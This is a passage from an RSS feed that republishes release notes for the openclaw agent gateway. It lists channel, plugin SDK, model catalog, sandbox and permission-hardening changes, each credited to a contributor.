<li>Configure/Ollama: show the configured Ollama model allowlist after Cloud only or Cloud + Local setup and skip slow per-model cloud metadata fetches. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347480168" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73995" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73995/hovercard" href="https://github.com/openclaw/openclaw/pull/73995">#73995</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Channels/WhatsApp: detect explicit group <code>@mentions</code> again when the bot's own E.164 is in <code>allowFrom</code>, so shared-number setups no longer skip group pings that directly mention the bot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4091909998" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/49317" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/49317/hovercard" href="https://github.com/openclaw/openclaw/issues/49317">#49317</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342031370" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73453" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73453/hovercard" href="https://github.com/openclaw/openclaw/pull/73453">#73453</a>) Thanks @juan-flores077.</li>
<li>WhatsApp/reliability: publish real transport-liveness into WhatsApp channel status and force earlier reconnects on silent transport stalls, so quiet healthy sessions stay connected while wedged sockets recover before the later remote 408 path. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4333644872" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72656" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72656/hovercard" href="https://github.com/openclaw/openclaw/pull/72656">#72656</a>) Thanks @Sathvik-1007.</li>
<li>Core/channels: tighten selected runtime, media, and plugin edge-case handling while preserving existing behavior. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a>.</li>
<li>Channels/WhatsApp: strip leaked plural tool-call XML wrappers on every WhatsApp-visible outbound path and keep channel error payloads out of WhatsApp chats. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329523309" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71830" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71830/hovercard" href="https://github.com/openclaw/openclaw/pull/71830">#71830</a>) Thanks @rubencu.</li>
<li>Agents/embedded-runner: inject the resolved OAuth bearer (and forward the run abort signal) on the boundary-aware embedded stream fallback so models that route through <code>openai-codex-responses</code> and other boundary-aware transports stop failing with <code>401 Unauthorized: Missing bearer or basic authentication in header</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343169386" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73559" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73559/hovercard" href="https://github.com/openclaw/openclaw/issues/73559">#73559</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343600007" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73588" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73588/hovercard" href="https://github.com/openclaw/openclaw/pull/73588">#73588</a>) Thanks @openperf.</li>
<li>Telegram/gateway: bound outbound Bot API calls and cache bundled plugin alias lookup so slow Telegram sends or WSL2 filesystem scans no longer wedge gateway replies. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348974196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74210" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74210/hovercard" href="https://github.com/openclaw/openclaw/pull/74210">#74210</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Configure/GitHub Copilot: reuse existing Copilot auth during configure and show the provider's manifest model catalog in the model picker. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349704967" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74276" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74276/hovercard" href="https://github.com/openclaw/openclaw/pull/74276">#74276</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Configure/models: keep the model picker scoped to the selected manifest provider and enable its bundled plugin before catalog lookup, so choosing GitHub Copilot no longer falls back to Ollama or skips the catalog. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350379800" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74322" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74322/hovercard" href="https://github.com/openclaw/openclaw/pull/74322">#74322</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/obviyus/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/obviyus">@obviyus</a>.</li>
<li>Auto-reply/subagents: reject <code>/focus</code> from leaf subagents and scope fallback target resolution to the requesting subagent's children, so subagents cannot bind conversations outside their control boundary. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344094857" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73613" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73613/hovercard" href="https://github.com/openclaw/openclaw/pull/73613">#73613</a>) Thanks @drobison00.</li>
<li>Gateway/startup: skip inherited workspace startup memory for sandboxed spawned sessions without real-workspace write access, so <code>/new</code> no longer preloads host workspace memory into isolated child runs. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344082702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73611" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73611/hovercard" href="https://github.com/openclaw/openclaw/pull/73611">#73611</a>) Thanks @drobison00.</li>
<li>Agents/tool policy: validate caller group IDs against session or spawned context before applying group-scoped tool policies or persisting gateway group metadata, so forged group IDs cannot unlock more permissive tools. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345261616" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73720" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73720/hovercard" href="https://github.com/openclaw/openclaw/pull/73720">#73720</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mmaps/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mmaps">@mmaps</a>.</li>
<li>Commands: keep channel-prefixed owner allowlist entries scoped to matching providers so webchat command contexts cannot inherit external channel owners. Thanks @zsxsoft.</li>
<li>Auth/device pairing: bound bootstrap handoff token issuance, redemption, and approved pairing baselines to the documented per-role scope allowlist, so bootstrap approvals cannot persistently grant <code>operator.admin</code>, <code>operator.pairing</code>, or <code>node.exec</code> scopes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/eleqtrizit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/eleqtrizit">@eleqtrizit</a>.</li>
<li>Providers/GitHub Copilot: support the GUI/RPC wizard device-code auth flow so onboarding from non-TTY clients (gateway RPC bridge, GUI wizards) completes instead of returning empty profiles. Dangerous-state handling now distinguishes <code>access_denied</code> and <code>expired_token</code> from transport errors. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4340731383" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73290" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73290/hovercard" href="https://github.com/openclaw/openclaw/pull/73290">#73290</a>) Thanks @indierawk2k2.</li>
<li>Installer/Linux: warn before switching an unwritable npm global prefix to <code>~/.npm-global</code>, then tell users to run future global updates with <code>npm i -g openclaw@latest</code> without <code>sudo</code> so npm keeps using the redirected user prefix. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4067034134" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44365" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44365/hovercard" href="https://github.com/openclaw/openclaw/issues/44365">#44365</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4102245984" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50479" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/50479/hovercard" href="https://github.com/openclaw/openclaw/pull/50479">#50479</a>. Thanks @Sayeem3051.</li>
<li>Gateway/plugins: enable the native <code>require()</code> fast path on Windows for bundled plugin modules so plugin loading uses <code>require()</code> instead of Jiti's transform pipeline, reducing startup from ~39s to ~2s on typical 6-plugin setups. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4288746847" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68656/hovercard" href="https://github.com/openclaw/openclaw/issues/68656">#68656</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348588169" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74173" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74173/hovercard" href="https://github.com/openclaw/openclaw/pull/74173">#74173</a>) Thanks @galiniliev.</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[openclaw 2026.4.27]]></title>
<description><![CDATA[2026.4.27
Changes

Sandbox/Docker: add opt-in sandbox.docker.gpus passthrough for Docker sandbox containers so local GPU workloads can run inside sandboxed agents when the host Docker runtime supports --gpus. Fixes #57976; carries forward #58124. Thanks @cyan-ember.
iOS/Gateway: add an authentica...]]></description>
<link>https://tsecurity.de/de/3475895/downloads/openclaw-2026427/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3475895/downloads/openclaw-2026427/</guid>
<pubDate>Thu, 30 Apr 2026 00:15:46 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>2026.4.27</h2>
<h3>Changes</h3>
<ul>
<li>Sandbox/Docker: add opt-in <code>sandbox.docker.gpus</code> passthrough for Docker sandbox containers so local GPU workloads can run inside sandboxed agents when the host Docker runtime supports <code>--gpus</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174567936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57976" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/57976/hovercard" href="https://github.com/openclaw/openclaw/issues/57976">#57976</a>; carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175598032" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58124" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/58124/hovercard" href="https://github.com/openclaw/openclaw/pull/58124">#58124</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cyan-ember/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cyan-ember">@cyan-ember</a>.</li>
<li>iOS/Gateway: add an authenticated <code>node.presence.alive</code> protocol event and <code>node.list</code> last-seen fields so background iOS wakes can mark paired nodes recently alive without treating them as connected. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4224034257" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63123" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63123/hovercard" href="https://github.com/openclaw/openclaw/pull/63123">#63123</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngutman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngutman">@ngutman</a>.</li>
<li>Android: publish authenticated <code>node.presence.alive</code> events after node connect and background transitions so paired Android nodes retain durable last-seen metadata after disconnects. Carries forward <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4224034257" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63123" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63123/hovercard" href="https://github.com/openclaw/openclaw/pull/63123">#63123</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ngutman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ngutman">@ngutman</a>.</li>
<li>Gateway/chat: accept non-image attachments through <code>chat.send</code> by staging them as agent-readable media paths, while keeping unsupported RPC attachment paths explicit instead of silently dropping files. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4081507639" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/48123" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/48123/hovercard" href="https://github.com/openclaw/openclaw/issues/48123">#48123</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4274009184" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/67572" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/67572/hovercard" href="https://github.com/openclaw/openclaw/pull/67572">#67572</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samzong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samzong">@samzong</a>.</li>
<li>Security/networking: add opt-in operator-managed outbound proxy routing (proxy.enabled + proxy.proxyUrl/OPENCLAW_PROXY_URL) with strict http:// forward-proxy validation, loopback-only Gateway bypass, and cleanup of proxy env/dispatcher state on exit. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307364306" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70044" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70044/hovercard" href="https://github.com/openclaw/openclaw/pull/70044">#70044</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jesse-merhi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jesse-merhi">@jesse-merhi</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/joshavant/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/joshavant">@joshavant</a>.</li>
<li>Dependencies: refresh provider and tooling dependencies, including AWS SDK, PI runtime packages, AJV, Feishu SDK, Anthropic SDK, tokenjuice, and native TypeScript/oxlint tooling. Thanks <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>.</li>
<li>Matrix/QA: add live Matrix approval scenarios for exec metadata, chunked fallback, plugin approvals, deny reactions, thread targeting, and <code>target: "both"</code> delivery, with redacted artifacts preserving safe approval summaries. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>Codex: add Computer Use setup for Codex-mode agents, including <code>/codex computer-use status/install</code>, marketplace discovery, optional auto-install, and fail-closed MCP server checks before Codex-mode turns start. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330543453" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72094" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72094/hovercard" href="https://github.com/openclaw/openclaw/issues/72094">#72094</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329591250" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71842" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71842/hovercard" href="https://github.com/openclaw/openclaw/pull/71842">#71842</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pash-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pash-openai">@pash-openai</a>.</li>
<li>Apps: consume Peekaboo 3.0.0-beta4 and ElevenLabsKit 0.1.1, align Swabble on Commander 0.2.2, and refresh macOS/iOS SwiftPM resolutions against the released dependency graph. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Blaizzy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Blaizzy">@Blaizzy</a>.</li>
<li>Plugin SDK: expose shared channel route normalization, parser-driven target resolution, raw-target compact keys, parsed-target types, and route comparison helpers through <code>openclaw/plugin-sdk/channel-route</code>, switch native approval origin matching onto that route contract with optional delivery and match-only target normalization, and retire the internal channel-route shim behind dated compatibility aliases for legacy key/comparable-target helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Docs/Codex: document how Codex Computer Use, direct <code>cua-driver mcp</code>, and OpenClaw.app's PeekabooBridge fit together so desktop-control setup choices are clearer. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pash-openai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pash-openai">@pash-openai</a> and <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/trycua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/trycua">@trycua</a>.</li>
<li>Matrix/streaming: stream tool-progress updates into live Matrix preview edits by default when preview streaming is active, with <code>streaming.preview.toolProgress: false</code> to keep answer previews while hiding interim tool lines. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gumadeiras/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gumadeiras">@gumadeiras</a>.</li>
<li>Plugins/models: wire manifest <code>modelCatalog.aliases</code> and <code>modelCatalog.suppressions</code> into model-catalog planning and built-in model suppression, with stale Spark and Qwen Coding Plan suppressions now declared in plugin manifests instead of runtime fallback hooks. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugin SDK/models: add a shared manifest-backed provider catalog builder and move Qianfan, Xiaomi, NVIDIA, Cerebras, Mistral, Moonshot, DeepSeek, Tencent TokenHub, and StepFun provider catalogs onto their plugin manifest <code>modelCatalog</code> rows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugin SDK/models: move BytePlus and Volcano Engine standard and plan-provider catalogs into plugin manifest <code>modelCatalog</code> rows and remove the now-unused Volcengine-family shared catalog SDK subpath. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: move Fireworks and Together AI fixed provider catalogs into plugin manifest <code>modelCatalog</code> rows so provider-filtered listing can use manifest-backed static rows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Channels/Yuanbao: register the Tencent Yuanbao external channel plugin (<code>openclaw-plugin-yuanbao</code>) in the official channel catalog, contract suites, and community plugin docs, with a new <code>docs/channels/yuanbao.md</code> quick-start guide for WebSocket bot DMs and group chats. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4335031388" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72756" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/72756/hovercard" href="https://github.com/openclaw/openclaw/pull/72756">#72756</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>.</li>
<li>Channels/Yuanbao: add a channel docs entrance so the Tencent Yuanbao bot appears in the channel listing and sidebar navigation. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341969080" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73443" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73443/hovercard" href="https://github.com/openclaw/openclaw/pull/73443">#73443</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/loongfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/loongfay">@loongfay</a>.</li>
<li>Channels/QQBot: add full group chat support (history tracking, @-mention gating, activation modes, per-group config, FIFO message queue with deliver debounce), C2C <code>stream_messages</code> streaming with a <code>StreamingController</code> lifecycle manager, unified <code>sendMedia</code> with chunked upload for large files, and refactor the engine into pipeline stages, focused outbound submodules, builtin slash-command modules, and explicit DI ports via <code>createEngineAdapters()</code>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4316471394" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70624" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70624/hovercard" href="https://github.com/openclaw/openclaw/pull/70624">#70624</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cxyhhhhh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cxyhhhhh">@cxyhhhhh</a>.</li>
<li>Plugins/startup: migrate bundled plugin manifests to explicit <code>activation.onStartup</code> declarations so Gateway startup imports only the bundled plugins that intentionally register startup-time runtime surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/startup: add an opt-in future-mode gate for disabling deprecated implicit startup sidecar loading while preserving explicit startup and narrower activation triggers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/startup: add plugin compatibility warnings for deprecated implicit startup loading so authors can migrate to explicit <code>activation.onStartup</code> metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/runtime: load bundled agent tool-result middleware from manifest contracts on demand so tokenjuice stays startup-lazy without losing Pi/Codex tool-output compaction. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/startup: add explicit <code>activation.onStartup</code> metadata so plugins can declare Gateway startup import behavior while the deprecated implicit sidecar fallback remains for legacy plugins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Gateway/startup: reuse lookup-table plugin manifests when loading startup plugins so Gateway boot avoids rebuilding plugin discovery and manifest metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/models: declare fixed Qianfan, Xiaomi, NVIDIA, Cerebras, Mistral, Chutes, Kilo, OpenAI, and OpenCode Go model catalogs in refreshable plugin manifests, keep broad <code>models list --all</code> on raw registry and supplement rows without runtime normalization, and avoid duplicate supplement resolution. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Gateway/runtime: reuse the current plugin metadata snapshot for provider discovery so repeated model-provider discovery avoids rebuilding plugin manifest metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Gateway/startup: pass the plugin metadata snapshot from config validation into plugin bootstrap so startup reuses one manifest product instead of rebuilding plugin metadata. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugin SDK/testing: move core-only channel contract fixtures under the channel contract test tree and retire the old <code>test/helpers/channels</code> bridge directory so plugin tests stay on focused SDK surfaces. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK/testing: expose native agent-runtime contract fixtures through <code>plugin-sdk/agent-runtime-test-contracts</code>, move sandbox config fixtures into the focused generic fixture subpath, and block extension tests from importing repo-only <code>test/helpers</code> bridges. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK/testing: expose generic module reload, bundled-path, Node builtin mock, channel pairing/envelope, HTTP server, temp-home, replay-policy, and live STT helpers through focused SDK test subpaths so extension tests no longer depend on repo-only helper bridges. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK: move maintained bundled channels off the deprecated <code>channel-config-schema-legacy</code> subpath, add an explicit bundled-channel schema SDK surface, and track both remaining legacy test/config compatibility barrels with dated removal windows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK/testing: expose media provider capability assertions and provider HTTP mocks through focused SDK test subpaths, and retire the repo-only media-generation test helper bridge. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK/testing: promote bundled plugin/provider/channel contract helpers to focused SDK test subpaths and retire the repo-only <code>test/helpers/plugins</code> TypeScript bridge. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK/testing: expose generic channel action, setup, status, and directory contract helpers through <code>plugin-sdk/channel-test-helpers</code> so bundled extension tests no longer import repo-only channel helper bridges. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK/testing: add <code>plugin-sdk/channel-target-testing</code> for shared channel target-resolution cases, document channel reaction helpers on <code>plugin-sdk/channel-feedback</code>, and keep the old <code>plugin-sdk/test-utils</code> alias as compatibility-only. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugin SDK/testing: add a focused generic fixture subpath for CLI capture, sandbox, skill, agent-message, system-event, terminal, chunking, auth-token, and typed-case helpers. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
